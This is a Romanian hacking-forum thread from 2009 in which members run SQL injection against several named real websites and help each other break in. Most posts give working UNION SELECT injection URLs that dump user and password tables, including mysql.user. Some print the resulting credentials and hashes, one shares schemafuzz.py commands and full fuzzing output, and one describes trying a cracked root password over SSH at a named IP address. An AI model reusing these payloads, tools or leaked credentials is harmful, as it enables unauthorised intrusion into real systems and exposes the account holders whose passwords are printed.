Flubber Posted January 11, 2009 Report Posted January 11, 2009 Salut baieti,am incercat SQL Injection in: http://proiecte.nipne.ro/ am aflat ca foloseste versiunea 4 ( http://proiecte.nipne.ro/pn2/index_en.php?id=1+AND+1=0+UNION+SELECT+ALL+concat_ws(0x3a,version(),user(),database())-- ) si am ajuns la stadiul unde trebuie sa ghicesc numele tabelului ( http://proiecte.nipne.ro/pn2/index_en.php?id=-1+UNION+SELECT+ALL+group_concat(schema_name)+from+information_schema.schemata-- ) ...putin ajutor?P.S.: daca nu am postat unde trebuia, rog un moderator/administrator sa imi mute post-ul si topic-ul, multumesc Quote
pacealik Posted January 11, 2009 Report Posted January 11, 2009 daca e versiunea 4 nu ai ce sa ii faci decat sa ghicesti tabelele ......e mai greupe asta l-am luat si eu acum cateva zile si i-am dat pace cand am vazut ca are versiunea 4 Quote
Flubber Posted January 11, 2009 Author Report Posted January 11, 2009 daca e versiunea 4 nu ai ce sa ii faci decat sa ghicesti tabelele ......e mai greupe asta l-am luat si eu acum cateva zile si i-am dat pace cand am vazut ca are versiunea 4am inteles, ms pentru ajutor Quote
Caracal Posted January 11, 2009 Report Posted January 11, 2009 http://proiecte.nipne.ro/pn2/index_en.php?id=-1+AND+1=2+UNION+SELECT+group_concat(utilizator,parola)%20from%20utilizatori-- Quote
Caracal Posted January 12, 2009 Report Posted January 12, 2009 http://proiecte.nipne.ro/pn2/index_en.php?id=-1+AND+1=2+UNION+SELECT+group_concat(utilizator,0x3a,parola)%20from%20utilizatori--uite..mai frumosmid:midullaur:laurstefan_carstea:nicoleta Quote
Flubber Posted January 12, 2009 Author Report Posted January 12, 2009 http://proiecte.nipne.ro/pn2/index_en.php?id=-1+AND+1=2+UNION+SELECT+group_concat(utilizator,0x3a,parola)%20from%20utilizatori--uite..mai frumosmid:midullaur:laurstefan_carstea:nicoletafrumos, e bun si "0x3a" asta la ceva, macar la despartit alea 3 banuiesc ca sunt MD5 si atat nu? nu sunt salty md5thx Quote
MrRip Posted January 12, 2009 Report Posted January 12, 2009 unix_chro cred ca ai gresit postul este altu cu e-manele asta este cu altceva oricum ... np . Flubber check this out sper sa te ajute http://proiecte.nipne.ro/pn2/index_en.php?id=-1+AND+1=2+UNION+SELECT+group_concat(user,0x3a,password)%20from%20mysql.user-- Quote
Flubber Posted January 12, 2009 Author Report Posted January 12, 2009 unix_chro cred ca ai gresit postul este altu cu e-manele asta este cu altceva oricum ... np . Flubber check this out sper sa te ajute http://proiecte.nipne.ro/pn2/index_en.php?id=-1+AND+1=2+UNION+SELECT+group_concat(user,0x3a,password)%20from%20mysql.user--mersi, sa le trimitem mail spunandu-le ca au vulnerabilitati? Quote
Guest Praetorian Posted January 12, 2009 Report Posted January 12, 2009 Da...daca era altu, .com, .net mai ziceam... Dar daca este .ro, sa ajutam Quote
MrRip Posted January 12, 2009 Report Posted January 12, 2009 Da...daca era altu, .com, .net mai ziceam... Dar daca este .ro, sa ajutam sunt de acord cu TinKode Quote
Flubber Posted January 12, 2009 Author Report Posted January 12, 2009 altul: http://www.apd.ro/publicatie.php?id=51+AND+1=0+UNION+SELECT+ALL+1,2,unhex(hex(@@version)),4,5,6,7,8,9,10,11,12--+ http://www.apd.ro/admin/login.php , aoleuu xDiar la ghicit coloane? are cineva un script care sa "rasfoiasca" (sa incerce diferite nume de coloane)sau ce script-uri anume speciale de SQL Injection aveti? ce imi recomandati?off: urasc ca nu pot sa schimb semnatura Quote
Guest Praetorian Posted January 12, 2009 Report Posted January 12, 2009 Ma tu crezi ca daca folosesti scripturi, programe rezolvi ceva?Mai bine ai incerca sa faci tu cu mintea ta.. fara ajutorul nici unui program.. Quote
Flubber Posted January 12, 2009 Author Report Posted January 12, 2009 Ma tu crezi ca daca folosesti scripturi, programe rezolvi ceva?Mai bine ai incerca sa faci tu cu mintea ta.. fara ajutorul nici unui program..aha, ms oricum, voi incerca si varianta asta Quote
Caracal Posted January 12, 2009 Report Posted January 12, 2009 http://www.darkc0de.com/others/schemafuzz.pypython schemafuzz.py --fuzz -u "http://www.site.com/index.php?id=1"dupa ce iti gaseste:python schemafuzz.py --dump -u "http://www.site.com/index.php?id=1" -D database -T table -C column1,column2...column999omu vad ca stie sa faca interogari si din browser. hai sa ne cacam in sus ca vezi doamne scripturile sunt naspa...te indobitocesc...my ass Quote
Flubber Posted January 13, 2009 Author Report Posted January 13, 2009 http://www.darkc0de.com/others/schemafuzz.pypython schemafuzz.py --fuzz -u "http://www.site.com/index.php?id=1"dupa ce iti gaseste:python schemafuzz.py --dump -u "http://www.site.com/index.php?id=1" -D database -T table -C column1,column2...column999omu vad ca stie sa faca interogari si din browser. hai sa ne cacam in sus ca vezi doamne scripturile sunt naspa...te indobitocesc...my asssuper, multumesc mult, in sfarsit ceea ce asteptam desi TinKode are dreptate (stie el ce zice) Quote
Guest Praetorian Posted January 13, 2009 Report Posted January 13, 2009 Ma Caracal, nu am zis ca scripturile sunt naspa...Dar care mai este farmecul, cand tu doar bagi in cmd niste cuvinte si iti face toata treaba...Una e cand dai scan dupa ele, apoi le faci cu diferite scripturi, decat cand cauti singur sa vezi daca e vulnerabil, si sa faci TU injectia manual. Quote
djdynutzu Posted January 15, 2009 Report Posted January 15, 2009 Stie cineva de unde sa iau decrypter pt md5 am incercat pe site-uri da nu merge ! Quote
Guest Praetorian Posted January 15, 2009 Report Posted January 15, 2009 Daca ai multe hash-uri md5 si chiar vrei sa le decryptezi bagati in comp rainbow tables. Quote
d3v1l Posted January 15, 2009 Report Posted January 15, 2009 http://3.14.by/en/md5 cel mai bun la ora actuala Quote
Flubber Posted January 16, 2009 Author Report Posted January 16, 2009 http://www.aries.ro - vulnerabil[+] URL:http://www.aries.ro/index.php?lang_id=2+AND+1=2+UNION+SELECT+darkc0de--[+] Evasion Used: "+" "--"[+] 02:20:54[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: aries_site User: root@localhost Version: 5.0.67[+] Number of tables names to be fuzzed: 347[+] Number of column names to be fuzzed: 277[+] Searching for tables and columns...[+] Found a table called: admin[+] Now searching for columns inside table "admin"[!] Found a column called:user[!] Found a column called:pass[!] Found a column called:id[-] Done searching inside table "admin" for columns![+] Found a table called: company[+] Now searching for columns inside table "company"[!] Found a column called:id[!] Found a column called:login[-] Done searching inside table "company" for columns![+] Found a table called: mysql.user[+] Now searching for columns inside table "mysql.user"[!] Found a column called:user[!] Found a column called:password[-] Done searching inside table "mysql.user" for columns![+] Found a table called: news[+] Now searching for columns inside table "news"[!] Found a column called:id[-] Done searching inside table "news" for columns![+] Found a table called: users[+] Now searching for columns inside table "users"[!] Found a column called:password[!] Found a column called:id[!] Found a column called:email[!] Found a column called:login[-] Done searching inside table "users" for columns![-] [02:36:10][-] Total URL Requests 1733[-] Doneam obtinut:user,pass din mysql.userroot:3c8c1a8e271e4bad (MySQL Hash) ---> root:toorinca ceva: www.aries.ro/admin (user,id,pass din admin -> user: admin ; id: admin ; pass: 1)am mai descoperit ca te poti conecta la aries.ro (prin DNS ip-ul este: 194.102.253.145) prin SSH 22, am incercat user-ul root, pass toor (din decriptarea hash-ului de mai sus) dar nu a mers.... acum am o nelamurire, toate userele astea unde le pot folosi? (nici la /admin nu au mers) Quote
Flubber Posted January 18, 2009 Author Report Posted January 18, 2009 ce program folosesti?script .py "schema fuzz"http://www.darkc0de.com/others/schemafuzz.py Quote
playftw Posted February 1, 2009 Report Posted February 1, 2009 unix_chro ce program ai folosit? Quote
redking Posted February 1, 2009 Report Posted February 1, 2009 http://www.santaluciahighlands.com/profile.php?id=-1+union+all+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user Quote